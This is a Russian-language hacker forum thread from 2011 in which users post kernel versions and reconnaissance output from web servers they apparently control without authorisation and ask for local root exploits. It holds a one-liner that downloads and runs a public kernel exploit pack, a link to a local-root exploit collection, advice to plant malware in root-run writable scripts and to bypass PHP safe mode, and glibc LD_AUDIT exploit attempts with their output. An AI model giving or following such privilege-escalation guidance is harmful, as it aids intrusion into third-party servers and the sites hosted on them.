Повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Expl0ited, 1 Oct 2011.

  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,036
    Likes Received:
    531
    Reputations:
    935
    ядро не рутабельное, и судя по дате сборке админ хорошо следит за серваком, можно конечно попробовать поискать врайтабельные скрипты которые запускает рут, но это очень мало вероятно.


    sweb, nic, masterhost, majordomo не рутаемые!
     
    _________________________
  2. N@b$ter

    N@b$ter Elder - Старейшина

    Joined:
    6 Oct 2009
    Messages:
    293
    Likes Received:
    73
    Reputations:
    21
    Code:
    FreeBSD local r00t zeroday
    by Kingcope
    November 2009
    'cc: unrecognized option `-nostartfiles
    program.o(.text+0x0): In function `_init':
    : multiple definition of `_init'
    /usr/lib/crti.o(.init+0x0): first defined here
    cp: w00t.so.1.0: No such file or directory
    usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]
                [-h sweepincrsize] [-i wait] [-l preload] [-M mask | time] [-m ttl]
                [-P policy] [-p pattern] [-S src_addr] [-s packetsize] [-t timeout]
                [-W waittime] [-z tos] host
           ping [-AaDdfLnoQqRrv] [-c count] [-I iface] [-i wait] [-l preload]
                [-M mask | time] [-m ttl] [-P policy] [-p pattern] [-S src_addr]
                [-s packetsize] [-T ttl] [-t timeout] [-W waittime]
                [-z tos] mcast-group
    не хочет(
    есть что нить под
    Code:
    FreeBSD 6.2-RELEASE FreeBSD 6.2-RELEASE #0: Fri Jan 12 11:05:30 UTC 2
    007     root@dessler.cse.buffalo.edu:/usr/obj/usr/src/sys/SMP  i386
    Желательно уже скомпилённое
     
  3. _Spamer_

    _Spamer_ Elder - Старейшина

    Joined:
    3 Feb 2009
    Messages:
    84
    Likes Received:
    140
    Reputations:
    16
    Uname: Linux *********.net 2.6.18-194.17.1.el5 #1 SMP Wed Sep 29 12:50:31 EDT 2010 x86_64
    Disabled PHP Functions: system, shell_exec, proc_terminate, proc_open, proc_nice, proc_getstatus, proc_close, escapeshellcmd, escapeshellarg, passthru, popen, virtual, show_source, pclose, exec, safe_dir, dl, ini_restore, chown, chgrp, shown_source, mysql_list_dbs, get_current_user, getmyid, apache_child_terminate, leak, pfsockopen, putenv
    Code:
     uname -a
        ls -la /boot
        ls -la --full-time /lib/lib*
        mount
        df -h
        cat /etc/issue
        cat /etc/crontab
        cat /proc/version
        cat /proc/sys/vm/mmap_min_addr
        pwd
    Не выполняются
    Реально порутать?
     
  4. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,036
    Likes Received:
    531
    Reputations:
    935
    Для начала нужно получить возможность выполнять системные команды.
     
    _________________________
  5. extrimportal

    extrimportal Member

    Joined:
    13 Nov 2010
    Messages:
    97
    Likes Received:
    35
    Reputations:
    0
    подсобите плиз
    Linux her.edu 2.6.18-164.el5xen #1 SMP Thu Sep 3 04:47:32 EDT 2009 i686
     
  6. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    1. wget http://www.grsecurity.net/~spender/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
    2. Выбираем сплоит.
    3. PROFIT!!!
     
  7. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    http://localroot.th3-0utl4ws.com/
    кстати, вообще хороший сборничек)
     
    2 people like this.
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,036
    Likes Received:
    531
    Reputations:
    935
    ДЛЯ ПОЛНОГО ПРЕДСТАВЛЕНИЯ КАРТИНКИ, НУЖНА ВСЯ ИНФОРМАЦИЯ С ПЕРВОГО ПОСТА ЭТОЙ ТЕМЫ!
     
    _________________________
  9. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    бакконект сперва зделай
    лови+
     
  10. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    есть в паблике чёнить за 2011??????
     
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,036
    Likes Received:
    531
    Reputations:
    935
    путевого ничего
     
    _________________________
  12. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    какие есть ещё варианты повысить права на новых серверах?????ваши мысли
     
  13. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,036
    Likes Received:
    531
    Reputations:
    935
    искать врайтабельные скрипты которые запускает рут, и внедрять туда зловред
     
    _________________________
    1 person likes this.
  14. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    $ uname -a
    Linux 2.6.18-194.8.1.el5.028stab070.5PAE #1 SMP Fri Sep 17 19:27:06 MSD 2010 i686 i686 i386 GNU/Linux
    $ ls -la /boot
    total 17184
    drwxr-xr-x 3 root root 4096 Oct 7 2010 .
    drwxr-xr-x 25 root root 4096 Jul 17 04:38 ..
    lrwxrwxrwx 1 root root 25 Mar 31 2010 System.map -> /boot/System.map-2.6.28.7
    -rw-r--r-- 1 root root 1002211 Sep 17 2010 System.map-2.6.18-194.8.1.el5.028stab070.5PAE
    -rw-r--r-- 1 root root 1018379 Mar 18 2009 System.map-2.6.28.7
    -rw-r--r-- 1 root root 70584 Sep 17 2010 config-2.6.18-194.8.1.el5.028stab070.5PAE
    -rw-r--r-- 1 root root 75215 Mar 18 2009 config-2.6.28.7
    drwxr-xr-x 2 root root 4096 Oct 7 2010 grub
    -rw------- 1 root root 2640983 Oct 7 2010 initrd-2.6.18-194.8.1.el5.028stab070.5PAE.img
    -rw------- 1 root root 2647070 Mar 18 2009 initrd-2.6.28.7.img
    lrwxrwxrwx 1 root root 25 Mar 31 2010 initrd.img -> /boot/initrd-2.6.28.7.img
    -rw-r--r-- 1 root root 80032 Mar 12 2009 message
    -rw-r--r-- 1 root root 118927 Sep 17 2010 symvers-2.6.18-194.8.1.el5.028stab070.5PAE.gz
    -r-------- 1 root root 6240327 Sep 17 2010 vmlinux-2.6.18-194.8.1.el5.028stab070.5PAE
    lrwxrwxrwx 1 root root 22 Mar 31 2010 vmlinuz -> /boot/vmlinuz-2.6.28.7
    -rw-r--r-- 1 root root 1917108 Sep 17 2010 vmlinuz-2.6.18-194.8.1.el5.028stab070.5PAE
    -rw-r--r-- 1 root root 1695248 Mar 18 2009 vmlinuz-2.6.28.7
    $ ls -la --full-time /lib/lib*
    -rwxr-xr-x 1 root root 7664 2010-07-27 18:46:29.000000000 +0200 /lib/libBrokenLocale-2.5.so
    lrwxrwxrwx 1 root root 22 2010-10-07 01:33:33.000000000 +0200 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
    -rwxr-xr-x 1 root root 16704 2010-07-27 18:46:29.000000000 +0200 /lib/libSegFault.so
    lrwxrwxrwx 1 root root 15 2010-10-07 01:34:00.000000000 +0200 /lib/libacl.so.1 -> libacl.so.1.1.0
    -rwxr-xr-x 1 root root 25624 2010-01-26 23:57:13.000000000 +0100 /lib/libacl.so.1.1.0
    -rwxr-xr-x 1 root root 14128 2010-07-27 18:46:30.000000000 +0200 /lib/libanl-2.5.so
    lrwxrwxrwx 1 root root 13 2010-10-07 01:33:33.000000000 +0200 /lib/libanl.so.1 -> libanl-2.5.so
    lrwxrwxrwx 1 root root 18 2010-03-31 09:30:28.000000000 +0200 /lib/libasound.so.2 -> libasound.so.2.0.0
    -rwxr-xr-x 1 root root 908940 2009-01-21 04:47:23.000000000 +0100 /lib/libasound.so.2.0.0
    lrwxrwxrwx 1 root root 16 2010-03-31 06:12:51.000000000 +0200 /lib/libattr.so.1 -> libattr.so.1.1.0
    -rwxr-xr-x 1 root root 15780 2007-01-06 06:12:05.000000000 +0100 /lib/libattr.so.1.1.0
    lrwxrwxrwx 1 root root 17 2010-10-07 01:33:41.000000000 +0200 /lib/libaudit.so.0 -> libaudit.so.0.0.0
    -rwxr-xr-x 1 root root 97220 2010-03-31 08:29:12.000000000 +0200 /lib/libaudit.so.0.0.0
    lrwxrwxrwx 1 root root 19 2010-10-07 01:33:41.000000000 +0200 /lib/libauparse.so.0 -> libauparse.so.0.0.0
    -rwxr-xr-x 1 root root 54832 2010-03-31 08:29:12.000000000 +0200 /lib/libauparse.so.0.0.0
    lrwxrwxrwx 1 root root 15 2010-03-31 09:30:05.000000000 +0200 /lib/libblkid.so.1 -> libblkid.so.1.0
    -rwxr-xr-x 1 root root 38556 2009-09-03 21:55:35.000000000 +0200 /lib/libblkid.so.1.0
    -rwxr-xr-x 1 root root 1689388 2010-07-27 18:46:30.000000000 +0200 /lib/libc-2.5.so
    lrwxrwxrwx 1 root root 11 2010-10-07 01:33:33.000000000 +0200 /lib/libc.so.6 -> libc-2.5.so
    lrwxrwxrwx 1 root root 14 2010-03-31 06:12:52.000000000 +0200 /lib/libcap.so.1 -> libcap.so.1.10
    -rwxr-xr-x 1 root root 11560 2007-03-14 19:15:10.000000000 +0100 /lib/libcap.so.1.10
    -rwxr-xr-x 1 root root 191708 2010-07-27 18:46:30.000000000 +0200 /lib/libcidn-2.5.so
    lrwxrwxrwx 1 root root 14 2010-10-07 01:33:33.000000000 +0200 /lib/libcidn.so.1 -> libcidn-2.5.so
    lrwxrwxrwx 1 root root 17 2010-03-31 09:30:05.000000000 +0200 /lib/libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x 1 root root 7748 2009-09-03 21:55:35.000000000 +0200 /lib/libcom_err.so.2.1
    -rwxr-xr-x 1 root root 45432 2010-07-27 18:46:30.000000000 +0200 /lib/libcrypt-2.5.so
    lrwxrwxrwx 1 root root 15 2010-10-07 01:33:33.000000000 +0200 /lib/libcrypt.so.1 -> libcrypt-2.5.so
    -rwxr-xr-x 1 root root 1296932 2010-03-26 22:46:10.000000000 +0100 /lib/libcrypto.so.0.9.8e
    lrwxrwxrwx 1 root root 19 2010-03-31 09:30:08.000000000 +0200 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
    -rwxr-xr-x 1 root root 1011760 2010-07-12 18:11:02.000000000 +0200 /lib/libdb-4.3.so
    lrwxrwxrwx 1 root root 18 2010-10-07 01:35:56.000000000 +0200 /lib/libdbus-1.so.3 -> libdbus-1.so.3.4.0
    -rwxr-xr-x 1 root root 253392 2010-03-31 15:20:46.000000000 +0200 /lib/libdbus-1.so.3.4.0
    lrwxrwxrwx 1 root root 31 2010-10-07 01:34:25.000000000 +0200 /lib/libdevmapper-event-lvm2.so -> libdevmapper-event-lvm2.so.2.02
    -r-xr-xr-x 1 root root 4900 2010-07-29 15:15:22.000000000 +0200 /lib/libdevmapper-event-lvm2.so.2.02
    lrwxrwxrwx 1 root root 37 2010-10-07 01:34:25.000000000 +0200 /lib/libdevmapper-event-lvm2mirror.so -> libdevmapper-event-lvm2mirror.so.2.02
    -r-xr-xr-x 1 root root 6900 2010-07-29 15:15:22.000000000 +0200 /lib/libdevmapper-event-lvm2mirror.so.2.02
    lrwxrwxrwx 1 root root 39 2010-10-07 01:34:25.000000000 +0200 /lib/libdevmapper-event-lvm2snapshot.so -> libdevmapper-event-lvm2snapshot.so.2.02
    -r-xr-xr-x 1 root root 4528 2010-07-29 15:15:22.000000000 +0200 /lib/libdevmapper-event-lvm2snapshot.so.2.02
    lrwxrwxrwx 1 root root 25 2010-10-07 01:33:42.000000000 +0200 /lib/libdevmapper-event.a -> libdevmapper-event.a.1.02
    -r-xr-xr-x 1 root root 40828 2010-05-26 14:53:35.000000000 +0200 /lib/libdevmapper-event.a.1.02
    lrwxrwxrwx 1 root root 26 2010-10-07 01:33:42.000000000 +0200 /lib/libdevmapper-event.so -> libdevmapper-event.so.1.02
    -r-xr-xr-x 1 root root 18156 2010-05-26 14:53:36.000000000 +0200 /lib/libdevmapper-event.so.1.02
    lrwxrwxrwx 1 root root 19 2010-10-07 01:33:42.000000000 +0200 /lib/libdevmapper.a -> libdevmapper.a.1.02
    -r-xr-xr-x 1 root root 414264 2010-05-26 14:53:36.000000000 +0200 /lib/libdevmapper.a.1.02
    lrwxrwxrwx 1 root root 20 2010-10-07 01:33:42.000000000 +0200 /lib/libdevmapper.so -> libdevmapper.so.1.02
    -r-xr-xr-x 1 root root 132620 2010-05-26 14:53:36.000000000 +0200 /lib/libdevmapper.so.1.02
    -rwxr-xr-x 1 root root 20668 2010-07-27 18:46:30.000000000 +0200 /lib/libdl-2.5.so
    lrwxrwxrwx 1 root root 12 2010-10-07 01:33:33.000000000 +0200 /lib/libdl.so.2 -> libdl-2.5.so
    lrwxrwxrwx 1 root root 34 2010-10-07 01:35:58.000000000 +0200 /lib/libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc13
    -rwxr-xr-x 1 root root 19388 2010-03-31 13:39:12.000000000 +0200 /lib/libdmraid-events-isw.so.1.0.0.rc13
    -r-xr-xr-x 1 root root 19388 2010-03-31 13:39:12.000000000 +0200 /lib/libdmraid-events-isw.so.1.0.0.rc13-17
    lrwxrwxrwx 1 root root 23 2010-10-07 01:35:58.000000000 +0200 /lib/libdmraid.so -> libdmraid.so.1.0.0.rc13
    -rwxr-xr-x 1 root root 219804 2010-03-31 13:39:12.000000000 +0200 /lib/libdmraid.so.1.0.0.rc13
    -r-xr-xr-x 1 root root 221440 2010-03-31 13:39:12.000000000 +0200 /lib/libdmraid.so.1.0.0.rc13-17
    lrwxrwxrwx 1 root root 13 2010-03-31 09:30:05.000000000 +0200 /lib/libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x 1 root root 21608 2009-09-03 21:55:35.000000000 +0200 /lib/libe2p.so.2.3
    lrwxrwxrwx 1 root root 17 2010-10-07 01:33:48.000000000 +0200 /lib/libexpat.so.0 -> libexpat.so.0.5.0
    -rwxr-xr-x 1 root root 133184 2010-09-07 17:37:44.000000000 +0200 /lib/libexpat.so.0.5.0
    lrwxrwxrwx 1 root root 16 2010-03-31 09:30:05.000000000 +0200 /lib/libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x 1 root root 115216 2009-09-03 21:55:35.000000000 +0200 /lib/libext2fs.so.2.4
    -rwxr-xr-x 1 root root 46636 2010-03-31 17:29:40.000000000 +0200 /lib/libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx 1 root root 28 2010-10-07 01:33:28.000000000 +0200 /lib/libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx 1 root root 23 2010-03-31 09:29:31.000000000 +0200 /lib/libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 644472 2009-03-25 02:52:17.000000000 +0100 /lib/libglib-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root 26 2010-03-31 09:29:31.000000000 +0200 /lib/libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 11396 2009-03-25 02:52:17.000000000 +0100 /lib/libgmodule-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root 26 2010-03-31 09:29:31.000000000 +0200 /lib/libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 259128 2009-03-25 02:52:17.000000000 +0100 /lib/libgobject-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root 26 2010-03-31 09:29:31.000000000 +0200 /lib/libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 16212 2009-03-25 02:52:17.000000000 +0100 /lib/libgthread-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 7880 2007-01-06 08:57:38.000000000 +0100 /lib/libkeyutils-1.2.so
    lrwxrwxrwx 1 root root 18 2010-03-31 06:12:51.000000000 +0200 /lib/libkeyutils.so.1 -> libkeyutils-1.2.so
    -rwxr-xr-x 1 root root 216544 2010-07-27 18:46:30.000000000 +0200 /lib/libm-2.5.so
    lrwxrwxrwx 1 root root 11 2010-10-07 01:33:33.000000000 +0200 /lib/libm.so.6 -> libm-2.5.so
    -rwxr-xr-x 1 root root 109740 2010-07-27 18:46:30.000000000 +0200 /lib/libnsl-2.5.so
    lrwxrwxrwx 1 root root 13 2010-10-07 01:33:33.000000000 +0200 /lib/libnsl.so.1 -> libnsl-2.5.so
    -rwxr-xr-x 1 root root 36416 2010-07-27 18:46:30.000000000 +0200 /lib/libnss_compat-2.5.so
    lrwxrwxrwx 1 root root 20 2010-10-07 01:33:33.000000000 +0200 /lib/libnss_compat.so.2 -> libnss_compat-2.5.so
    -rwxr-xr-x 1 root root 825028 2010-05-13 13:02:40.000000000 +0200 /lib/libnss_db-2.2.so
    lrwxrwxrwx 1 root root 16 2010-10-07 01:34:42.000000000 +0200 /lib/libnss_db.so.2 -> libnss_db-2.2.so
    -rwxr-xr-x 1 root root 21948 2010-07-27 18:46:30.000000000 +0200 /lib/libnss_dns-2.5.so
    lrwxrwxrwx 1 root root 17 2010-10-07 01:33:33.000000000 +0200 /lib/libnss_dns.so.2 -> libnss_dns-2.5.so
    -rwxr-xr-x 1 root root 50848 2010-07-27 18:46:30.000000000 +0200 /lib/libnss_files-2.5.so
    lrwxrwxrwx 1 root root 19 2010-10-07 01:33:33.000000000 +0200 /lib/libnss_files.so.2 -> libnss_files-2.5.so
    -rwxr-xr-x 1 root root 22764 2010-07-27 18:46:30.000000000 +0200 /lib/libnss_hesiod-2.5.so
    lrwxrwxrwx 1 root root 20 2010-10-07 01:33:33.000000000 +0200 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
    -rwxr-xr-x 1 root root 3201120 2010-04-03 05:07:24.000000000 +0200 /lib/libnss_ldap-2.5.so
    lrwxrwxrwx 1 root root 18 2010-10-07 01:34:31.000000000 +0200 /lib/libnss_ldap.so.2 -> libnss_ldap-2.5.so
    -rwxr-xr-x 1 root root 46536 2010-07-27 18:46:30.000000000 +0200 /lib/libnss_nis-2.5.so
    lrwxrwxrwx 1 root root 17 2010-10-07 01:33:33.000000000 +0200 /lib/libnss_nis.so.2 -> libnss_nis-2.5.so
    -rwxr-xr-x 1 root root 55804 2010-07-27 18:46:30.000000000 +0200 /lib/libnss_nisplus-2.5.so
    lrwxrwxrwx 1 root root 21 2010-10-07 01:33:33.000000000 +0200 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
    lrwxrwxrwx 1 root root 16 2010-03-31 09:30:09.000000000 +0200 /lib/libpam.so.0 -> libpam.so.0.81.5
    -rwxr-xr-x 1 root root 44532 2010-03-11 18:24:38.000000000 +0100 /lib/libpam.so.0.81.5
    lrwxrwxrwx 1 root root 21 2010-03-31 09:30:09.000000000 +0200 /lib/libpam_misc.so.0 -> libpam_misc.so.0.81.2
    -rwxr-xr-x 1 root root 10168 2010-03-11 18:24:38.000000000 +0100 /lib/libpam_misc.so.0.81.2
    lrwxrwxrwx 1 root root 17 2010-03-31 09:30:09.000000000 +0200 /lib/libpamc.so.0 -> libpamc.so.0.81.0
    -rwxr-xr-x 1 root root 9868 2010-03-11 18:24:38.000000000 +0100 /lib/libpamc.so.0.81.0
    lrwxrwxrwx 1 root root 16 2010-03-31 06:12:51.000000000 +0200 /lib/libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x 1 root root 118896 2007-11-30 06:10:26.000000000 +0100 /lib/libpcre.so.0.0.1
    -rwxr-xr-x 1 root root 54308 2010-03-31 06:53:48.000000000 +0200 /lib/libproc-3.2.7.so
    -rwxr-xr-x 1 root root 137908 2010-07-27 18:46:30.000000000 +0200 /lib/libpthread-2.5.so
    lrwxrwxrwx 1 root root 17 2010-10-07 01:33:33.000000000 +0200 /lib/libpthread.so.0 -> libpthread-2.5.so
    -rwxr-xr-x 1 root root 80636 2010-07-27 18:46:30.000000000 +0200 /lib/libresolv-2.5.so
    lrwxrwxrwx 1 root root 16 2010-10-07 01:33:33.000000000 +0200 /lib/libresolv.so.2 -> libresolv-2.5.so
    -rwxr-xr-x 1 root root 48156 2010-07-27 18:46:30.000000000 +0200 /lib/librt-2.5.so
    lrwxrwxrwx 1 root root 12 2010-10-07 01:33:33.000000000 +0200 /lib/librt.so.1 -> librt-2.5.so
    -rwxr-xr-x 1 root root 93508 2009-09-04 01:05:42.000000000 +0200 /lib/libselinux.so.1
    -rwxr-xr-x 1 root root 159412 2009-09-04 00:49:09.000000000 +0200 /lib/libsemanage.so.1
    -rwxr-xr-x 1 root root 245376 2010-03-31 10:26:18.000000000 +0200 /lib/libsepol.so.1
    lrwxrwxrwx 1 root root 12 2010-03-31 09:30:05.000000000 +0200 /lib/libss.so.2 -> libss.so.2.0
    -rwxr-xr-x 1 root root 20492 2009-09-03 21:55:35.000000000 +0200 /lib/libss.so.2.0
    -rwxr-xr-x 1 root root 293108 2010-03-26 22:46:10.000000000 +0100 /lib/libssl.so.0.9.8e
    lrwxrwxrwx 1 root root 16 2010-03-31 09:30:08.000000000 +0200 /lib/libssl.so.6 -> libssl.so.0.9.8e
    -rwxr-xr-x 1 root root 6056 2007-03-14 18:17:47.000000000 +0100 /lib/libsysSp.so
    lrwxrwxrwx 1 root root 19 2010-03-31 06:12:51.000000000 +0200 /lib/libtermcap.so.2 -> libtermcap.so.2.0.8
    -rwxr-xr-x 1 root root 13084 2007-01-06 14:01:17.000000000 +0100 /lib/libtermcap.so.2.0.8
    -rwxr-xr-x 1 root root 33852 2010-07-27 18:46:30.000000000 +0200 /lib/libthread_db-1.0.so
    lrwxrwxrwx 1 root root 19 2010-10-07 01:33:33.000000000 +0200 /lib/libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x 1 root root 15308 2010-07-27 18:46:30.000000000 +0200 /lib/libutil-2.5.so
    lrwxrwxrwx 1 root root 14 2010-10-07 01:33:33.000000000 +0200 /lib/libutil.so.1 -> libutil-2.5.so
    lrwxrwxrwx 1 root root 14 2010-03-31 09:30:05.000000000 +0200 /lib/libuuid.so.1 -> libuuid.so.1.2
    -rwxr-xr-x 1 root root 15704 2009-09-03 21:55:35.000000000 +0200 /lib/libuuid.so.1.2
    lrwxrwxrwx 1 root root 22 2010-10-07 01:34:16.000000000 +0200 /lib/libvolume_id.so.0 -> libvolume_id.so.0.66.0
    -rwxr-xr-x 1 root root 30732 2010-08-05 01:29:24.000000000 +0200 /lib/libvolume_id.so.0.66.0
    lrwxrwxrwx 1 root root 16 2010-03-31 09:29:32.000000000 +0200 /lib/libwrap.so.0 -> libwrap.so.0.7.6
    -rwxr-xr-x 1 root root 32824 2009-09-22 00:37:30.000000000 +0200 /lib/libwrap.so.0.7.6
    $ mount
    /dev/root on / type ext3 (rw,data=ordered,usrquota,grpquota)
    /dev on /dev type tmpfs (rw)
    /proc on /proc type proc (rw)
    /sys on /sys type sysfs (rw)
    /proc/bus/usb on /proc/bus/usb type usbfs (rw)
    none on /dev/pts type devpts (rw)
    none on /dev/shm type tmpfs (rw)
    /dev/sdb1 on /drive2 type ext3 (rw,data=ordered)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /proc on /var/named/chroot/proc type proc (rw)
    /dev/root on /var/named/chroot/var/run/dbus type ext3 (rw,data=ordered,usrquota,grpquota)
    /etc/auto.misc on /misc type autofs (rw,fd=7,pgrp=6460,timeout=300,minproto=5,maxproto=5,indirect)
    -hosts on /net type autofs (rw,fd=13,pgrp=6460,timeout=300,minproto=5,maxproto=5,indirect)
    $ df -h
    Filesystem Size Used Avail Use% Mounted on
    /dev/root 442G 281G 139G 67% /
    /dev 3.9G 88K 3.9G 1% /dev
    none 3.9G 0 3.9G 0% /dev/shm
    /dev/sdb1 459G 90G 347G 21% /drive2
    $ cat /etc/issue
    CentOS release 5.5 (Final)
    Kernel \r on an \m

    $ cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/

    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly
    $ cat /proc/version
    Linux version 2.6.18-194.8.1.el5.028stab070.5PAE (root@rhel5-build-x32) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Fri Sep 17 19:27:06 MSD 2010
     
    #174 trololoman96, 31 Dec 2011
    Last edited by a moderator: 31 Dec 2011
  15. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Linux web 2.4.23-ow1 #1 SMP чУЛ дЕЛ 21 18:34:07 EST 2003 i686
    Safe mode: ON
    Команды не выполняются, бэкконнект не пашет. Но висят ценные сайты. Можно порутать?

    P.S. Сам в шоке :D
     
  16. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,036
    Likes Received:
    531
    Reputations:
    935
    trololoman96, glibc
    Ereee, ищи safe mode bypass под версию твоего PHP, ну и попробуй glibc
     
    _________________________
    2 people like this.
  17. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    что есть под:
    FreeBSD 6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16 04:45:45 UTC 2008
    ??
    и
    Darwin *** 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15 16:57:01 PDT 2009; root:xnu-1228.15.4~1/RELEAS
     
    #177 Osstudio, 31 Dec 2011
    Last edited: 31 Dec 2011
  18. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Под первую пробуй w00t, должно взят. А под вторую ничего не встречал.
     
  19. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Делал все как описывается здесь. В итоге в первый раз в конце меня выкинуло с шела, во 2 пишет уже это:
    Code:
    sh-3.2$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    sh: /proc/self/fd/3: Permission Denied
    sh: /proc/self/fd/3: Success
    sh: no job control in this shell
    
    дальше при вводе любой команды выдает ошибку
    Code:
    ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot read file data; ignored.
    
     
  20. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    пропатчено
     
Loading...